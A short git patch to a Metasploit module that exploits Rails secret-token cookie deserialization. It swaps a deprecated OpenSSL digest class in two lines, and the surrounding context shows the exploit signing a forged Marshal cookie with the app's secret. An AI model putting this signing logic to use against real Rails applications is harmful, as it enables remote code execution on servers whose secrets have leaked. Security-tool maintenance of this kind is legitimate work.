From e79ccb08cb4e2f1c655fb2cbb73fcd6e3aa41b92 Mon Sep 17 00:00:00 2001
From: Niel Nielsen
Date: Tue, 7 Jan 2014 21:41:15 +0100
Subject: [PATCH] Update rails_secret_deserialization.rb

When using aws-sdk with Ruby 2.1.0-rc1, many "Digest::Digest is deprecated; use Digest" warnings are printed. Even in Ruby 1.8.7-p374, OpenSSL::Digest::Digest is only provided for backward compatibility.
---
 modules/exploits/multi/http/rails_secret_deserialization.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 5fa74b9488..46751d2f1f 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
 keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000})
 sigkey = keygen.generate_key(datastore['SALTSIG'])
 end
- digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
+ digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
 end
 def rails_4
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def rails_3
 # Sign it with the secret_token
 data = build_cookie
- digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"), datastore['SECRET'], data)
+ digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), datastore['SECRET'], data)
 marshal_payload = Rex::Text.uri_encode(data)
 "#{marshal_payload}--#{digest}"
 end